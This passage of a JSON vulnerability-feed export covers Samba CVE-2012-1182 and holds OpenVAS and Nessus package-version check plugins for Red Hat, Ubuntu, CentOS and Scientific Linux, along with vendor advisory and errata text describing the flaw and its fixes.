exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:56", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-04-11T00:00:00", "id": "OPENVAS:1361412562310870581", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870581", "title": "RedHat Update for samba RHSA-2012:0465-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2012:0465-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00002.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870581\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:22 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465-01\");\n script_name(\"RedHat Update for samba RHSA-2012:0465-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"samba on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:20:38", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1423-1", "modified": "2017-12-01T00:00:00", "published": "2012-04-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840980", "id": "OPENVAS:840980", "title": "Ubuntu Update for samba USN-1423-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1423_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for samba USN-1423-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Brian Gorenc discovered that Samba incorrectly calculated array bounds when\n handling remote procedure calls (RPC) over the network. A remote,\n unauthenticated attacker could exploit this to execute arbitrary code as the\n root user. (CVE-2012-1182)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1423-1\";\ntag_affected = \"samba on Ubuntu 11.10 ,\n Ubuntu 11.04 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1423-1/\");\n script_id(840980);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-13 10:33:26 +0530 (Fri, 13 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1423-1\");\n script_name(\"Ubuntu Update for samba USN-1423-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.4.7~dfsg-1ubuntu3.9\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.11~dfsg-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.8~dfsg-1ubuntu2.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"3.0.28a-1ubuntu4.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:45", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881194", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881194", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos5", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018562.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881194\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:40:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libsmbclient'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "samba": [{"lastseen": "2019-05-29T19:19:13", "bulletinFamily": "software", "description": "Samba versions 3.6.3 and all versions previous to this are affected by a vulnerability that allows remote code execution as the \"root\" user from an anonymous connection.\nThe code generator for Samba's remote procedure call (RPC) code contained an error which caused it to generate code containing a security flaw. This generated code is used in the parts of Samba that control marshalling and unmarshalling of RPC calls over the network.\nThe flaw caused checks on the variable containing the length of an allocated array to be done independently from the checks on the variable used to allocate the memory for that array. As both these variables are controlled by the connecting client it makes it possible for a specially crafted RPC call to cause the server to execute arbitrary code.\nAs this does not require an authenticated connection it is the most serious vulnerability possible in a program, and users and vendors are encouraged to patch their Samba installations immediately.", "modified": "2012-04-10T00:00:00", "published": "2012-04-10T00:00:00", "id": "SAMBA:CVE-2012-1182", "href": "https://www.samba.org/samba/security/CVE-2012-1182.html", "title": "\"root\" credential remote code execution. ", "type": "samba", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:25:48", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:0506\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result in\ncode generated by the PIDL compiler to not sufficiently protect against\nbuffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which\nprovides a number of bug fixes and enhancements over the previous version.\nIn particular, improved interoperability with Active Directory (AD)\ndomains. SSSD now uses the libndr-krb5pac library to parse the Privilege\nAttribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client library,\nis included as a Technology Preview. This functionality and server\nlibraries, is included as a Technology Preview. This functionality uses the\nlibndr-nbt library to prepare Connection-less Lightweight Directory Access\nProtocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security\nAuthority (LSA) and Net Logon services to allow verification of trust\nfrom a Windows system. Because the Cross Realm Kerberos Trust functionality\nis considered a Technology Preview, selected samba4 components are\nconsidered to be a Technology Preview. For more information on which Samba\npackages are considered a Technology Preview, refer to Table 5.1, \"Samba4\nPackage Support\" in the Release Notes, linked to from the References.\n(BZ#766333, BZ#882188)\n\nThis update also fixes the following bug:\n\n* Prior to this update, if the Active Directory (AD) server was rebooted,\nWinbind sometimes failed to reconnect when requested by \"wbinfo -n\" or\n\"wbinfo -s\" commands. Consequently, looking up users using the wbinfo tool\nfailed. This update applies upstream patches to fix this problem and now\nlooking up a Security Identifier (SID) for a username, or a username for a\ngiven SID, works as expected after a domain controller is rebooted.\n(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure that\nyou uninstall the package named \"samba4\" to avoid conflicts during the\nupgrade.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031536.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-February/006889.html\n\n**Affected packages:**\nsamba4\nsamba4-client\nsamba4-common\nsamba4-dc\nsamba4-dc-libs\nsamba4-devel\nsamba4-libs\nsamba4-pidl\nsamba4-python\nsamba4-swat\nsamba4-test\nsamba4-winbind\nsamba4-winbind-clients\nsamba4-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0506.html", "modified": "2013-03-09T00:42:54", "published": "2013-02-27T19:38:13", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-February/006889.html", "id": "CESA-2013:0506", "title": "samba4 security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:24:01", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:0515\n\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls. With\nthis update, the code has been generated with an updated version of PIDL to\ncorrect this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which\nprovides a number of bug fixes and enhancements over the previous version,\nincluding support for the rebased samba4 packages and several API changes.\n(BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs:\n\n* When the user tried to modify a meeting with one required attendee and\nhimself as the organizer, a segmentation fault occurred in the memcpy()\nfunction. Consequently, the evolution-data-server application terminated\nunexpectedly with a segmentation fault. This bug has been fixed and\nevolution-data-server no longer crashes in the described scenario.\n(BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with\na large message body or with extensive attachment. This was caused by minor\nissues in OpenChange's exchange.idl definitions. This bug has been fixed\nand OpenChange now sends extensive messages without complications.\n(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031358.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031491.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-February/006708.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-February/006844.html\n\n**Affected packages:**\nevolution-mapi\nevolution-mapi-devel\nopenchange\nopenchange-client\nopenchange-devel\nopenchange-devel-docs\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0515.html", "modified": "2013-03-09T00:42:10", "published": "2013-02-27T19:34:43", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-February/006708.html", "id": "CESA-2013:0515", "title": "evolution, openchange security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:26:55", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2012:0465\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-April/030600.html\nhttp://lists.centos.org/pipermail/centos-announce/2012-April/030603.html\n\n**Affected packages:**\nlibsmbclient\nlibsmbclient-devel\nsamba\nsamba-client\nsamba-common\nsamba-doc\nsamba-domainjoin-gui\nsamba-swat\nsamba-winbind\nsamba-winbind-clients\nsamba-winbind-devel\nsamba-winbind-krb5-locator\n\n**Upstream details at:**\n", "modified": "2012-04-10T23:59:51", "published": "2012-04-10T21:30:27", "href": "http://lists.centos.org/pipermail/centos-announce/2012-April/030600.html", "id": "CESA-2012:0465", "title": "libsmbclient, samba security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:25:36", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2012:0466\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-April/030599.html\n\n**Affected packages:**\nsamba3x\nsamba3x-client\nsamba3x-common\nsamba3x-doc\nsamba3x-domainjoin-gui\nsamba3x-swat\nsamba3x-winbind\nsamba3x-winbind-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0466.html", "modified": "2012-04-10T21:13:02", "published": "2012-04-10T21:13:02", "href": "http://lists.centos.org/pipermail/centos-announce/2012-April/030599.html", "id": "CESA-2012:0466", "title": "samba3x security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-03-18T02:47:12", "bulletinFamily": "scanner", "description": "A flaw was found in the Samba suite", "modified": "2013-03-05T00:00:00", "id": "SL_20130221_SAMBA4_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/65015", "published": "2013-03-05T00:00:00", "title": "Scientific Linux Security Update : samba4 on SL6.x i386/x86_64 (20130221)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65015);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/27\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : samba4 on SL6.x i386/x86_64 (20130221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References.\n\nThis update also fixes the following bug :\n\n - Prior to this update, if the Active Directory (AD)\n server was rebooted, Winbind sometimes failed to\n reconnect when requested by 'wbinfo -n' or 'wbinfo -s'\n commands. Consequently, looking up users using the\n wbinfo tool failed. This update applies upstream patches\n to fix this problem and now looking up a Security\n Identifier (SID) for a username, or a username for a\n given SID, works as expected after a domain controller\n is rebooted.\n\nWarning: If you upgrade from Scientific Linux 6.3 to Scientific Linux\n6.4 and you have Samba in use, you should make sure that you uninstall\nthe package named 'samba4' to avoid conflicts during the upgrade.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1303&L=scientific-linux-errata&T=0&P=206\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c774b705\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n 